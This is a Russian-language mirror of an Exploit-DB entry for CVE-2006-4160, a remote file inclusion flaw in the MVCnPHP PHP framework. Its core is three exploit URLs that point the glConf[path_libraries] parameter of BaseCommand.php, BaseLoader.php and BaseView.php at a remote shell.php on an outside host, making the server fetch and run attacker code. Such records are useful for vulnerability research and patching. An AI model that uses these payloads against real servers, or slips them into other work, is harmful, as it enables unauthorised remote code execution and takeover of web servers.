- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2173
- Проверка EDB
-
- Пройдено
- Автор
- DRAGO84
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4160
- Дата публикации
- 2006-08-10
Код:
MVCnPHP Remote File Inclusion
############ToXiC CrEw###############
Bug Found by Drago84
Page Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz
Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php
ExP:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
# milw0rm.com [2006-08-10]- Источник
- www.exploit-db.com
